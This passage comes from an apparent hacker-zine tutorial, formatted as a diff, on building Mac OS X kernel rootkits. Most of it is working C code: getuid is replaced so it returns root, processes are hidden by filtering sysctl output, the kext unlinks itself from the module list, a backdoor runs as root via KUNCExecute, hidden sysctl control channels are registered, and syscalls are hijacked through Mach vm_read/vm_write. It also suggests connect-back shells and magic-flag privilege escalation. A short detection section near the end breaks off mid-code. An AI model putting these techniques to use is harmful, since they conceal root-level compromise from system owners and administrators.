+        fixpt_t p_pctcpu;        /* %cpu for this process during p_swtime */
+        void    *p_wchan;        /* Sleep address. */
+        char    *p_wmesg;        /* Reason for sleep. */
+        u_int   p_swtime;        /* Time swapped in or out. */
+        u_int   p_slptime;       /* Time since last blocked. */
+        struct  itimerval p_realtimer;  /* Alarm timer. */
+        struct  timeval p_rtime;        /* Real time. */
+        u_quad_t p_uticks;              /* Statclock hits in user mode. */
+        u_quad_t p_sticks;              /* Statclock hits in system mode. */
+        u_quad_t p_iticks;              /* Statclock hits processing intr. */
+        int     p_traceflag;            /* Kernel trace points. */
+        struct  vnode *p_tracep;        /* Trace to vnode. */
+        int     p_siglist;              /* DEPRECATED */
+        struct  vnode *p_textvp;        /* Vnode of executable. */
+        int     p_holdcnt;              /* If non-zero, don't swap. */
+        sigset_t p_sigmask;     /* DEPRECATED. */
+        sigset_t p_sigignore;   /* Signals being ignored. */
+        sigset_t p_sigcatch;    /* Signals being caught by user. */
+        u_char  p_priority;     /* Process priority. */
+        u_char  p_usrpri;       /* User-priority based on p_cpu and p_nice. */
+        char    p_nice;         /* Process "nice" value. */
+        char    p_comm[MAXCOMLEN+1];
+        struct  pgrp *p_pgrp;   /* Pointer to process group. */
+        struct  user *p_addr; /* Kernel virtual addr of u-area (PROC ONLY). */
+	u_short p_xstat;        /* Exit status for wait; also stop signal. */
+        u_short p_acflag;       /* Accounting flags. */
+        struct  rusage *p_ru;   /* Exit information. XXX */
+};
+
+
+The internal definition in the kernel is available from the xnu source in
+the file xnu-xxx/bsd/sys/proc_internal.h and contains a lot more info than
+it's userland counterpart. If we take a look at the userland version of
+the proc structure from Mac OS X 10.3, with Darwin 7.0, and compares it to
+the structure above we can spot the differences right away (some comments
+and whitespace is removed to save space and make it more readable)
+
+struct	proc {
+	LIST_ENTRY(proc) p_list;	/* List of all processes. */
+	struct	pcred *p_cred;		/* Process owner's identity. */
+	struct	filedesc *p_fd;		/* Ptr to open files structure. */
+	struct	pstats *p_stats;	/* Accounting/statistics (PROC ONLY). */
+	struct	plimit *p_limit;	/* Process limits. */
+	struct	sigacts *p_sigacts;	/* Signal actions, state (PROC ONLY). */
+#define	p_ucred		p_cred->pc_ucred
+#define	p_rlimit	p_limit->pl_rlimit
+	int	p_flag;			/* P_* flags. */
+	char	p_stat;			/* S* process status. */
+	char	p_pad1[3];
+	pid_t	p_pid;			/* Process identifier. */
+	LIST_ENTRY(proc) p_pglist;	/* List of processes in pgrp. */
+	struct	proc *p_pptr;	 	/* Pointer to parent process. */
+	LIST_ENTRY(proc) p_sibling;	/* List of sibling processes. */
+	LIST_HEAD(, proc) p_children;	/* Pointer to list of children. */
+#define	p_startzero	p_oppid
+	pid_t	p_oppid;	 /* Save parent pid during ptrace. XXX */
+	int	p_dupfd;	 /* Sideways return value from fdopen. XXX */
+	u_int	p_estcpu;	 /* Time averaged value of p_cpticks. */
+	int	p_cpticks;	 /* Ticks of cpu time. */
+	fixpt_t	p_pctcpu;	 /* %cpu for this process during p_swtime */
+	void	*p_wchan;	 /* Sleep address. */
+	char	*p_wmesg;	 /* Reason for sleep. */
+	u_int	p_swtime;	 /* DEPRECATED (Time swapped in or out.) */
+#define	p_argslen p_swtime	 /* Length of process arguments. */
+	u_int	p_slptime;	 /* Time since last blocked. */
+	struct	itimerval p_realtimer;	/* Alarm timer. */
+	struct	timeval p_rtime;	/* Real time. */
+	u_quad_t p_uticks;		/* Statclock hits in user mode. */
+	u_quad_t p_sticks;		/* Statclock hits in system mode. */
+	u_quad_t p_iticks;		/* Statclock hits processing intr. */
+	int	p_traceflag;		/* Kernel trace points. */
+	struct	vnode *p_tracep;	/* Trace to vnode. */
+	sigset_t p_siglist;		/* DEPRECATED. */
+	struct	vnode *p_textvp;	/* Vnode of executable. */
+#define	p_endzero	p_hash.le_next
+	LIST_ENTRY(proc) p_hash;	/* Hash chain. */
+	TAILQ_HEAD( ,eventqelt) p_evlist;
+#define	p_startcopy	p_sigmask
+	sigset_t p_sigmask;		/* DEPRECATED */
+	sigset_t p_sigignore;	/* Signals being ignored. */
+	sigset_t p_sigcatch;	/* Signals being caught by user. */
+	u_char	p_priority;	/* Process priority. */
+	u_char	p_usrpri;	/* User-priority based on p_cpu and p_nice. */
+	char	p_nice;		/* Process "nice" value. */
+	char	p_comm[MAXCOMLEN+1];
+	struct 	pgrp *p_pgrp;	/* Pointer to process group. */
+#define	p_endcopy	p_xstat
+	u_short	p_xstat;	/* Exit status for wait; also stop signal. */
+	u_short	p_acflag;	/* Accounting flags. */
+	struct	rusage *p_ru;	/* Exit information. XXX */
+	int	p_debugger;	/* 1: can exec set-bit programs if suser */
+	void	*task;			/* corresponding task */
+	void	*sigwait_thread;	/* 'thread' holding sigwait */
+	struct lock__bsd__ signal_lock;	/* multilple thread prot for signals*/
+	boolean_t	 sigwait;	/* indication to suspend */
+	void	*exit_thread;		/* Which thread is exiting? */
+	caddr_t	user_stack;		/* where user stack was allocated */
+	void * exitarg;			/* exit arg for proc terminate */
+	void * vm_shm;			/* for sysV shared memory */
+	int  p_argc;			/* saved argc for sysctl_procargs() */
+	int p_vforkcnt;		/* number of outstanding vforks */
+	void *  p_vforkact;     /* activation running this vfork proc */
+	TAILQ_HEAD( , uthread) p_uthlist; /* List of uthreads  */
+	pid_t	si_pid;
+	u_short si_status;
+	u_short	si_code;
+	uid_t	si_uid;
+	TAILQ_HEAD( , aio_workq_entry ) aio_activeq;
+	int		aio_active_count;	/* entries on aio_activeq */
+	TAILQ_HEAD( , aio_workq_entry ) aio_doneq;
+	int		aio_done_count;		/* entries on aio_doneq */
+	struct klist p_klist;  /* knote list */
+	struct  auditinfo		*p_au;	/* User auditing data */
+#if DIAGNOSTIC
+#if SIGNAL_DEBUG
+	unsigned int lockpc[8];
+	unsigned int unlockpc[8];
+#endif /* SIGNAL_DEBUG */
+#endif /* DIAGNOSTIC */
+};
+
+As you can seen, Apple has redone this structure quite a bit and removed
+a lot of stuff, most of the changes where introduced between version 10.3
+and 10.4 of Mac OS X. One of the changes to the structure is the removal
+of the p_ucred pointer, which is a pointer to a structure that contains
+the user credentials of the current process. 
+
+This effectively breaks nemos [5] technique of setting a process user-id
+and group-id to zero, which he does like this:
+
+void uid0(struct proc *p) {
+	register struct pcred *pc = p->p_cred;
+	pcred_writelock(p);
+	(void)chgproccnt(pc->p_ruid, -1);
+	(void)chgproccnt(0, 1);
+	pc->pc_ucred = crcopy(pc->pc_ucred);
+	pc->pc_ucred->cr_uid = 0;
+	pc->p_ruid = 0;
+	pc->p_svuid = 0;
+	pcred_unlock(p);
+	set_security_token(p);
+	p->p_flag |= P_SUGID;
+	return;
+}
+
+For a rootkit developer that wants to modify specific kernel structures
+this is somewhat of a problem, both the fact that the kernel structures
+are neither exported or well documented and the fact that they might
+rapidly change between kernel versions. Fortunately the kernel source is
+now open source and can be freely downloaded from Apple. This makes it
+possible to extract the needed kernel structures from the source.
+
+-[ 2.4 - The I/O Kit Framework
+
+Mac OS X contains a complete framework of libraries, tools and various
+other resources for creating device drivers. This framework is called the
+I/O Kit. The I/O Kit framework provides an abstract view of the hardware
+to the upper layers of Mac OS X, which simplifies device driver
+development and thus makes it's less time consuming. The entire framework
+is object-oriented and implemented using a somewhat cut down version C++
+to promote increased code reuse.
+
+Since this framework operates in kernelspace and can interact with actual
+hardware, it's ideal for writing keylogging software. A good example of
+abusing the I/O Kit framework for just that purpose is the keylogger
+called "logKext", [10] written by drspringfield, which utilizes the I/O
+Kit framework to log a users keystrokes. This is just one of many uses of
+this framework in rootkit development. Feel free to explore and come up
+with your own creative ways of subverting the Mac OS X kernel using the
+I/O Kit framework.
+
+--[ 3 - Kernel development on Mac OS X
+
+As Mac OS X is somewhat of a hybrid between a number of different
+technologies runtime modification of the operating system  can be done in
+several ways. One of the easiest methods is to load the 'improved'
+functionality as a kernel driver. Drivers can be loaded either as kernel
+extensions for the BSD sub-layer or as Object Oriented I/O Kit drivers.
+For the purpose of this first exercise only ordinary BSD kernel extensions
+will be utilized due to their simplicity and ease of development.
+
+The easiest way to write a kernel extension for Mac OS X is to use the
+XCode-templates for 'Generic Kernel Extension'. Open Xcode, Select 'New
+Project' in the File-menu. From the list of available templates choose
+'Generic Kernel Extension' under 'Kernel Extension'. Give the project a
+suitable name, such as 'rootkit 0.1' and click 'Finish'. This creates a
+new Xcode project for your new kernel rootkit.
+
+The newly automatically created .c-file contains the entry and exit points
+for the kernel extension: 
+
+kern_return_t rootkit_0_1_start (kmod_info_t * ki, void * d) {
+    return KERN_SUCCESS;
+}
+
+
+kern_return_t rootkit_0_1_stop (kmod_info_t * ki, void * d) {
+    return KERN_SUCCESS;
+}
+
+rootkit_0_1_start() will be invoked when the kernel extension is loaded
+using /sbin/kextload and rootkit_0_1_stop() will be invoked when the
+kernel extension is unloaded using /sbin/kextunload. 
+
+Loading and unloading of kernel extensions require root privileges, and
+the code in these functions will be executed in kernelspace with full
+control of the entire operating system. It is therefore of the utmost
+importance that any code executed takes makes sure not to make a mess of
+everything and thereby crashes the entire operating system. To quote the
+Apple 'Kernel Program Guide': "Kernel programming is a black art that
+should be avoided if at all possible" [4].
+
+Any changes made to the kernel in the start()-function must be undone in
+the stop-function(). Functions, variables and other types of loadable
+objects will be deallocated when the module is unloaded and any future
+reference to them will cause the operating system to misbehave or in worst
+case crash.
+
+Building your project is as easy as clicking the 'build button'. The
+compiled kernel extension can be found in the build/Relase/-directory and
+is named 'rootkit 0.1.kext'. /sbin/kextload refuses to load kernel
+extensions unless they are owned by the root user and belongs to the wheel
+group. This can easily be fixed by chown:ing the files accordingly.
+Fledging kernel hackers that dislikes the Xcode GUI:s will be please to
+known that the project can be build just as easily from the command line
+using the 'xcodebuild' command. 
+
+Apple provides the XCode IDE and the gcc compiler on the Mac OS X DVD, if
+needed the latest version can also be downloaded from [2] after
+registration.  The source code for the XNU kernel can also be downloaded
+from [3]. It is recommended that you keep a copy of the kernel sourcecode
+at hand as reference during development.
+
+One of the great advantages of using the kernel extension API is that the
+kextload command takes care of everything from linking to loading. This
+means that the entire rootkit can be written in C, making it almost
+trivially easy. Another great advantage of C-development is portability
+which is an important issue considering that Mac OS X is available for two
+different CPU architectures.
+
+-[ 3.1 - Kernel version dependence
+
+As Landon Fuller notes in research access to the nsysent variable needed
+to find the sysentry-table is restricted unless the kext is compiled for a
+specific kernel release. This is due to the simple fact that the address
+of this variable is likely to change between kernel releases. Kernel
+dependence for kernel extensions is configured in the Info.plist file
+included in the XCode-project. The 'com.apple.kernel'-key needs to be
+added to OSBundleLibraries with the version set to the Kernel release as
+indicated by the 'uname -r' command:
+
+<key>OSBundleLibraries</key>
+<dict>
+    <key>com.apple.kernel</key>
+    <string>9.6.0</string>
+</dict>
+
+This ties the compiled kernel extension specifically to version 9.6.0 of
+the Kernel. A recompile of the kernel extension is needed for each minor
+and major release. The kernel extension will refuse to load in any other
+version of the Mac OS X kernel, in many cases that might be considered a
+good thing.  
+
+--[ 4 - Your first OS X kernel rootkit
+
+-[ 4.1 - Replacement of a simple syscall
+
+To start of the whole kernel subversion business we'll take a quick
+example of replacing the getuid() function. This function returns the
+current user ID and in this example it will be replaced it with a function
+that always returns uid zero (root). This will not automatically give all
+users root access, only the illusion of having root access. Fun but
+innocent :)
+
+int new_getuid()
+{
+  return(0); 
+}
+
+kern_return_t rootkit_0_1_start (kmod_info_t * ki, void * d) {
+
+  struct sysent *sysent = find_sysent();
+  sysent[SYS_getuid].sy_call = (void *) new_getuid;
+
+  return KERN_SUCCESS;
+
+}
+
+This simple code-snippet first defines a new getuid()-function that always
+returns 0 (root). The new function will be loaded in kernel memory by the
+kextload-function. When the start()-function runs it will replace the
+original getuid() syscall with the new and 'improved' version. Returning 
+KERN_SUCCESS indicates to the operating system that everything went as 
+planed and that the insertion of the kernel extension was successful.
+
+A complete version can be found in the code section of this paper;
+including the unloading function that might prove useful once the initial
+thrill is over. 
+
+-[ 4.2 - Hiding processes 
+ 
+The '/bin/ps' command, 'top' and the Activity Monitor all list running
+processes using the sysctl(3) syscall. sysctl(2) is a general purpose
+multifunction API used to communicate with a multitude of different
+functions in the kernel. sysctl(2) is used both to list running processes
+as well open network sockets. In order to intercept and modify the running
+process list the entire sysctl syscall needs to be intercepted and the
+commands parsed in order to identify calls to the CTL_KERN->KERN_PROC
+command used to list current running processes.
+
+The sysctl(2) syscall is intercepted using the exactly same method as
+getuid(), but one of the major differences is that special attention needs
+to be taken with regards to the arguments. In order to support both big
+and little endian systems Apple uses padding macros named PADL and PADR
+that makes the argument struct look very exotic. The easiest way to get it
+right is to copy the entire struct definition from the XNU kernel source
+in order to avoid confusion with the padding. 
+
+sysctl(2) takes its function commands in the form of a char-array called
+'name'. The commands are hierarchical and most commands have several
+subcommands that in turn can have subcommands or arguments. The sysctl(2)
+commands and their respective subcommands can be found in
+'/usr/include/sys/sysctl.h'.
+
+The CTL_KERN->KERN_PROC command to sysctl copies a list of all running
+processes to a user provided buffer. From the perspective of the rootkit
+this presents a problem since we want to modify the data before it is
+returned to the user but since the syscall writes the data directly to the
+user provided buffer this is problematic. Fortunately we are in position
+to manipulate the data in the user buffer prior returning control to the
+user software. This requires copying the data from userspace into a
+kernelspace buffer, doing the required modification and then copying the
+data back into userspace.
+
+First memory needed to store the copy of the data needs to be allocated
+using the MALLOC-macro, then the data needs to be copied from userspace
+using the copyin(9)-function. The copyin(9) function copies data from
+userspace to kernelspace. Then the data needs to be processed and selected
+entries removed. The actual process of deleting an entry is done by
+overwriting it with the rest of the data in the buffer. This requires
+doing an overlapping memory copy, this functionality is provided by the
+bcopy(3) function. Once an entry has been removed the counter for the
+total size of the buffer needs to be decreased and the data can finally be
+returned, or rather copied, to userspace. 
+
+      /* Search for process to remove */
+      for (i = 0; i < nprocs; i++) 
+        if(plist[i].kp_proc.p_pid == 11) /* hardcoded PID */
+          { 
+
+            /* If there is more then one entry left in the list 
+	     * overwrite this entry with the rest of the buffer */
+
+            if((i+1) < nprocs)
+              bcopy(&plist[i+1],&plist[i],(nprocs - (i + 1)) * sizeof(struct kinfo_proc));
+            
+            /* Decrease size */
+	    oldlen -= sizeof(struct kinfo_proc);
+            nprocs--;
+          }
+
+The modified data is then copied back to the userspace buffer using the
+copyout(9) function. In this case two different functions are used to copy
+data to userspace. The suulong(9) function is used to copy only small
+amounts of data to userspace while copyout(9) is used to copy the actual
+data buffer.
+
+      /* Copy back the length to userspace */
+      suulong(uap->oldlenp,oldlen);
+
+      /* Copy the data back to userspace */
+      copyout(mem,uap->old, oldlen);
+
+
+The data trailing the last entry will, if the data was modified, contain
+an extra copy of the last entry in the buffer, something that might be
+used to detect that the buffer has been modified. To avoid this the
+trailing data can be zero:ed. A more sophisticated rootkit might want to
+store a copy of the original buffer prior to the call to the real syscall
+and use that data to pad the remaining buffer space. 
+
+A reference implementation of a processes hiding kernel extension can be 
+found in the code section of this paper.
+
+-[ 4.3 - Hiding files
+
+As noted earlier, three different syscalls are of interest when hiding
+files, SYS_getdirentries, SYS_getdirentriesattr and SYS_getdirentries64.
+All of these syscalls share the sysctl(2) approach in that the calling
+application provides a buffer that the syscall will fill with appropriate
+data and return a counter indicating how much data was written. Due to the
+variable size of each record pointer arithmetics is required when parsing
+the data. All in all it is a complicated procedure and any mishaps is
+likely to cause a kernel crash. It is also important to patch all three
+syscalls of the getdirent-syscall in order to maintain the illusion that
+the malicious files have disappeared.
+
+The process is very similar to hiding a process; the original function is
+invoked, the data copied from userspace to kernelspace, modified as needed
+and then copied back. 
+
+A reference implementation of a file hiding kernel extension can be found
+in the code section of this paper.
+
+-[ 4.4 - Hiding a kernel extension
+
+Kernel modules can be listed with the command 'kextstat'. If the rogue
+rootkit kernel extension can be easily identified using the kextstat
+commands it sort of voids the purpose of the rootkit. nemo [5] identified
+a simple and elegant way to hide the presence of a kernel module for the
+WeaponX [9] kernel rootkit. 
+
+extern kmod_info_t *kmod; 
+
+void activate_cloaking() 
+{ 
+        kmod_info_t *k; 
+        k = kmod; 
+        kmod = k->next; 
+}
+
+This short snippet of code finds the linked list containing the loaded
+modules and simply delinks the last loaded module from that list. Since
+the kextstat utility will walk this list when presenting the information
+on loaded kernel extensions the newly loaded rootkit will disappear from
+that list. For the same reason the kextunload utility will also fail to
+unload the module from the kernel, which actually can be quite annoying.
+
+-[ 4.5 - Running userspace programs from kernelspace
+
+On Mac OS X there exists a special API called KUNC (Kernel-User
+Notification Center) [6]. This API is used when the kernel (i.e. a KEXT)
+might need to display a notification to the user or run commands in
+userspace.
+
+The KUNC function used to execute commands in userspace is KUNCExecute().
+This function is quite handy in rootkit development, since we may execute
+any command we want as root from kernelspace. The function definition
+looks like this.
+
+(Taken from xnu-xxx/osfmk/UserNotification/KUNCUserNotifications.h)
+
+#define kOpenApplicationPath    0
+#define kOpenPreferencePanel    1
+#define kOpenApplication        2
+
+#define kOpenAppAsRoot          0
+#define kOpenAppAsConsoleUser   1
+
+kern_ret_t
+KUNCExecute(char *executionPath, int openAsUser, int pathExecutionType);
+
+The "executionPath" is the file-system path to the application or
+executable to execute. The "openAsUser" flag can either be
+"kOpenAppAsConsoleUser", to execute the application as the logged-in user
+or "kOpenAppAsRoot", to run the application as root. The
+"pathExecutionType" flag specifies the type of application to execute, and
+can be one of the following.
+
+kOpenApplicationPath - The absolute file-system path to a executable.
+kOpenPreferencePanel - The name of a preference pane in
+/System/Library/PreferencePanes.
+kOpenApplication - The name of a application in the "/Applications" folder.
+
+To execute the binary "/var/tmp/mybackdoor" we simply do like this:
+
+KUNCExecute("/var/tmp/mybackdoor", kOpenAppAsRoot, kOpenApplicationPath);
+
+This function is especially useful in combination with some sort of
+trigger, like a hooked tcp-handler that executes the function and spawns a
+connect-back shell to the source-ip of a magic trigger-packet. The
+interesting parts of the network layer is actually exported and can be 
+easily modified. 
+
+Or if you prefer a local privilege escalation backdoor, why not hook
+SYS_open and execute the specified file with KUNCExecute if you supply a
+magic flag? The possibilities are endless.
+
+-[ 4.6 - Controlling your rootkit from userspace
+
+Once the appropriate syscalls and kernel functions has been replaced with
+rogue versions capable of hiding files, network sockets and processes each
+of these needs to know what to hide. 
+
+A popular way to trigger process hiding is to hook SYS_kill and send a
+special signal (31337 perhaps?) to the process to hide. This is easy and
+requires no special tools of any kind. If the processes hiding is
+performed by setting special flags on the process this flag can be
+inherited for fork() and exec() and thereby hide an entire process-tree. 
+
+Hiding files and sockets is trickier since we have no easy way to indicate
+to the kernel that we want them hidden. The creation of a new syscall is
+an easy way, or to piggy-back on one of the hooked ones and have a special
+magic argument to trigger the communication code. This does however
+require special tools in userspace capable of calling the right syscall
+with the correct arguments. These tools can be identified and searched for
+even if the rootkit tries to hide them in the filesystem they are always
+vulnerable to offline analysis. 
+
+An easy way to create a communication channel that doesn't require special
+tools or an entry in the /dev/-directory is to use sysctl. In the Mac OS X
+kernel drivers can register their own variables and have them changed
+using the /usr/sbin/sysctl-tool which is available by default on all
+systems. 
+
+Registering a new sysctl can be easily done using the normal kext
+procedures. The source for the example below can be found in reference 7.
+
+/* global variable where argument for our sysctl is stored */
+int  sysctl_arg = 0;
+
+static int sysctl_hideproc SYSCTL_HANDLER_ARGS 
+{     
+      int error;     
+      error = sysctl_handle_int(oidp, oidp->oid_arg1,oidp->oid_arg2, req); 
+		
+     if (!error && req->newptr) 
+      {         
+	 if(arg2 == 0)
+	   printf("Hide process %d\n",sysctl_arg);
+	 else	       
+	   printf("Unhide process %d\n",sysctl_arg);
+       }
+       
+   /* We return failure so that we dont show up in "sysclt -A"-listings. */
+   return KERN_FAILURE;
+}
+       
+       
+/* Create our sysctl:s */
+SYSCTL_PROC(_hw, OID_AUTO, hideprocess,CTLTYPE_INT|CTLFLAG_ANYBODY|CTLFLAG_WR,
+	    &sysctl_arg, 0, &sysctl_hideproc , "I", "Hide a process"); 
+
+SYSCTL_PROC(_hw, OID_AUTO, unhideprocess,CTLTYPE_INT|CTLFLAG_ANYBODY|CTLFLAG_WR,
+	    &sysctl_arg, 1, &sysctl_hideproc , "I", "Unhide a process"); 
+
+
+kern_return_t kext_start (kmod_info_t * ki, void * d) {
+
+    /* Register our sysctl */
+    sysctl_register_oid(&sysctl__hw_hideprocess);
+    sysctl_register_oid(&sysctl__hw_unhideprocess);
+
+    return KERN_SUCCESS;
+}
+
+This code registers two new sysctl variables, hw.hideprocess and
+hw.unhideprocess. When written to using sysctl -w hw.hideprocess=99 the
+function sysctl_hideproc() is invoked and can be used to add the selected
+PID to the list of processes to hide. A sysctl for hiding files is
+slightly different since it takes a string as argument instead of an
+integer but the overall procedure is the same. The major reason to use
+sysctl is that it support dynamic registration of variable and the
+required tool sysctl is provided by the operating system. 
+
+The -A flag for sysctl is avoided by returning KERN_FAILURE whenever the
+function is called, this causes the newly created variables to be omitted
+from the listing. 
+
+There is also a number of other ways of communicating with the kernel and
+controlling your rootkit. For example you can use the Mach API for IPC or
+using kernel control sockets, both has their pros and cons.
+
+--[ 5 - Runtime kernel patching using the Mach APIs
+
+Instead of using a rogue kernel module (kext) to hijack syscalls the Mach
+API's can be used for runtime kernel patching. This is nothing new to the
+rootkit community, and has previously been used in rootkits such as SucKIT
+by sd [7] and phalanx by rebel [8], two very impressive rootkits for
+Linux.
+
+To access kernel memory on Linux both SucKIT and phalanx uses /dev/kmem
+(and later /dev/mem). /dev/kmem and /dev/mem has been removed from Mac OS
+X as of version 10.4. The Mach-subsystem does however provide a very
+useful set of memory manipulation functions. The functions of interest for
+a rootkit developer are vm_read(), vm_write() and vm_allocate(). These
+functions allows arbitrary read and write access to the entire kernel from
+userspace as well as allowing allocation of kernel memory. The only
+requirement is root access. 
+
+The vm_allocate() function in particular is of great value. A common
+technique used on other operating systems to allocate kernel memory is to
+replace a system call handler with the kmalloc() function, and then
+execute the syscall. This way an attacker is able to allocate memory in
+kernelspace needed to store the wrapper functions. The big downside of
+this approach is the race condition introduced in case some other userland
+process calls the same syscall. But since the friendly Apple kernel
+developers provided the vm_allocate() function this isn't necessary on Mac
+OS X.
+
+-[ 5.1 - System call hijacking
+
+The vm_read() and vm_write() functions can be used as great tools for
+syscall hijacking. First off the address of the sysentry table needs to be
+located. The process identified by Landon Fuller [1] works just as good
+from userspace as it does from kernelspace. The sysentry table contains
+pointers to all the syscall handler functions we want to hijack.
+
+To read the address to the handler function for a syscall, i.e. SYS_kill,
+we can use the vm_read() function, and passing it the address of the
+sy_call variable of SYS_kill.
+
+mach_port_t port;
+pointer_t buf; /* pointer to your result */
+unsigned int r_addr = (unsigned int)&_sysent[SYS_kill].sy_call; /* address to sy_call */
+unsigned int len = 4; /* number of bytes to read */
+unsigned int sys_kill_addr = 0; /* final destination */
+
+/* get a port to pid 0, the mach kernel */
+if (task_for_pid(mach_task_self(), 0, &port)) {
+   fprintf(stderr, "failed to get port\n");
+   exit(EXIT_FAILURE);
+}
+
+/* read len bytes from r_addr, return pointer to the data in &buf */
+if (vm_read(port, (vm_address_t)r_addr, (vm_size_t)len, &buf, &sz) != KERN_SUCCESS) {
+   fprintf(stderr, "could not read memory\n");
+   exit(EXIT_FAILURE);
+}
+
+/* do proper typecast */
+sys_kill_addr = *(unsigned int*)buf;
+
+The address to the SYS_kill handler is now available in the sys_kill_addr
+variable. Replacing a syscall handler is as simple as writing a new value
+to the same location using the vm_write() function. In the example below
+we replace the SYS_setuid system call handler with the handler for
+SYS_exit, which will result in the termination of any program that calls
+SYS_setuid.
+
+SYSENT *_sysent = get_sysent_from_mem();
+mach_port_t port;
+pointer_t buf;
+unsigned int r_addr = (unsigned int)&_sysent[SYS_exit].sy_call; /* address to sy_call */
+unsigned int len = 4; /* number of bytes to read */
+unsigned int sys_exit_addr = 0; /* final destination */
+unsigned int sz, addr;
+
+/* get a port to pid 0, the mach kernel */
+if (task_for_pid(mach_task_self(), 0, &port)) {
+        fprintf(stderr, "failed to get port\n");
+	exit(EXIT_FAILURE);
+}
+
+/* read len bytes from r_addr, return pointer to the data in &buf */
+if (vm_read(port, (vm_address_t)r_addr, (vm_size_t)len, &buf, &sz) != KERN_SUCCESS) {
+        fprintf(stderr, "could not read memory\n");
+	exit(EXIT_FAILURE);
+}
+
+/* do proper typecast */
+sys_exit_addr = *(unsigned int*)buf;
+
+/* address to system call handler pointer of SYS_setuid */
+addr = (unsigned int)&_sysent[SYS_setuid].sy_call;
+
+/* replace SYS_setuids handler with the handler of SYS_exit */
+if (vm_write(port, (vm_address_t)addr, (vm_address_t)&sys_exit_addr, 
+                      sizeof(sys_exit_addr))) {
+   fprintf(stderr, "could not write memory\n");
+   exit(EXIT_FAILURE);
+}
+
+Now if any program calls setuid(), it will be redirected to the system
+call handler of SYS_exit, and end gracefully. The same thing that can be
+done using a kernel extension can also be accomplished using the Mach API.
+
+In order to actually create a wrapper or completely replace a function
+some kernel memory is needed to store the new code. Below is a simple
+example of how to allocate 4096 bytes of kernel memory using the Mach API.
+
+vm_address_t buf; /* pointer to our newly allocated memory */
+mach_port_t port; /* a mach port is a communication channel between threads */
+
+/* get a port to pid 0, the mach kernel */
+if (task_for_pid(mach_task_self(), 0, &port)) {
+   fprintf(stderr, "failed to get port\n");
+   exit(EXIT_FAILURE);
+}
+
+/* allocate memory and return the pointer to &buf */
+if (vm_allocate(port, &buf, 4096, TRUE)) {
+   fprintf(stderr, "could not allocate memory\n");
+   exit(EXIT_FAILURE);
+}
+
+If everything went as planned we now have 4096 bytes of fresh kernel
+memory at our disposal, accessible via buf. This memory can be used as a
+place to store our syscall hooks
+
+-[ 5.2 - Direct Kernel Object Manipulation
+
+It is not just system calls that can be hijacked using this technique, it
+also works just as good to manipulate various other objects in
+kernelspace.  A good example of such a object is the allproc structure,
+which is a list of proc structures of currently running processes on the
+system. This list is used by programs such as ps(1) and top(1) to get
+information about the running processes.
+
+So if you have processes you want to hide from a nosy administrator a nice
+way of doing so is by removing the process proc strcuture from the allproc
+list. This will make the process magically disappear from ps(1), top(1)
+and any other tools that uses the allproc structure as source of
+information.
+
+The allproc struct is, just as the nsysten variable, a exported symbol of
+the kernel. To get the address of the allproc structure in memory you may
+do something like this:
+
+# nm /mach_kernel | grep allproc
+0054280c S _allproc
+#
+
+Now that you have the address of the allproc structure (0x0054280c) all
+you need to do is to modify the list and remove the proc structure of
+the preferred process. As described in "Designing BSD Rootkits" [11] this
+is usually done iterating through the list with the LIST_FOREACH() macro
+and removing entries with the LIST_REMOVE() macro. Since we can't modify
+the memory directly we have to use a wrapper utilizing the vm_read() and
+vm_write() functions, which we also leave as an exercise for the reader
+to implement. :)
+
+--[ 6 - Detection
+
+Detecting kernel rootkits can be very difficult. Some well known rootkits
+leaves traces in the filesystem or open network sockets that can be used
+to identify them. But this is nothing every rootkit does and wont help you
+to spot unknown rootkits. 
+
+Keeping a known good list of the sysentry table and comparing that to the
+current state is another way to try to identify if syscalls have been
+modified. A popular workaround for that is to keep a shadow copy of the
+entire syscall table and modify the interupt-handler to the use the shadow
+table instead of the original one. This will leave the original sysentry
+table intact and anyone looking at it will find it unmodified even though
+all syscalls are still re-routed through the malicious functions. Another
+way is to replace the entire interrupt-handler as well as the sysentry
+table. 
+
+Rootkits that intercept syscalls and modify the contents can sometimes be
+found by the fact that the buffer used to return data has junk at the end.
+Rootkit developers could surely fix this problem, but they often don't.
+Other indications of mischief is that calls that only returns counters,
+for instance the number of running processes, systematically doesn't match
+the count of running processes when listed. 
+
+One way of finding hidden files is to write software that accesses the
+underlying filesystem directly and matches the files on disk with the
+output from the kernel. This requires writing filesystem software or
+finding a library for the specific filesystem used. The upside is that it
+is virtually impossible to intercept and modify calls to the raw device. 
+
+Rootkits that hide open ports can under some circumstances be detected by
+port-scanning, when more advanced rootkits often use port-knocking or
+other types out of band signaling to avoid opening ports. 
+
+Detecting rootkits is a cat and mouse game, and the only winning move is
+not to play. 
+
+-[ 6.1 - Detecting hooked system calls on Mac OS X
+
+Now that you know how to hook system calls, we are going to show you a
+simple, yet effective, way of detecting if your system has gotten any of
+it's system calls hijacked.
+
+We already know that we can get the location of the sysent array in
+memory by adding 32 bytes to the exported nsysent symbol. We also know
+that the nsysent symbol contains the actual number of syscalls available
+on Mac OS X, which is 427 (0x1ab) on 10.5.6.
+
+Now, if we want to check if the current sysent array has been compromised
+we need something to compare it with, something like the original table.
+On Mac OS X the kernel image is a uncompressed, universal (Leopard)
+macho-o binary named mach_kernel found in the root of the filesystem. If
+we take a closer look at the kernel image we get this:
+
+# otool -d /mach_kernel | grep -A 10 "ab 01"
+[...]
+0050a780	ab 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
+0050a790	00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
+0050a7a0	00 00 00 00 94 cf 38 00 00 00 00 00 00 00 00 00 
+0050a7b0	01 00 00 00 00 00 00 00 01 00 00 00 6a 37 37 00
+#
+
+At 0050a780 we see the magic number 427 (0x000001ab), the number of
+available syscalls. If we look 32 bytes ahead we see the value 0x38cf94,
+can this be the start of the sysent array? I think it is!
+
+All we need to is to copy the kernel image to a buffer, find the offset to
+the nsysent symbol, add 32 bytes to the offset and return a pointer to
+that position and we have our original sysent array. All this can be done
+with the following C function.
+
+char *
+get_sysent_from_disk(void)
+{
+	char *p;
+	FILE *fp;
+
+	unsigned long sz;
+	int i;
+
+	fp = fopen("/mach_kernel", "r");
+	if (!fp) {
+		fprintf(stderr, "could not open file\n");
+		exit(-1);
+	}
+
+	fseek(fp, 0, SEEK_END);
+	sz = ftell(fp);
+	fseek(fp, 0, SEEK_SET);
+
+	buf = malloc(sz);
+	p = buf;
+
+	fread(buf, sz, 1, fp);
+	fclose(fp);
+
+	for (i = 0; i < sz; i++) {
+		if (*(unsigned int *)(p) == 0x000001ab &&
+			*(unsigned int *)(p + 4) == 0x00000000) {
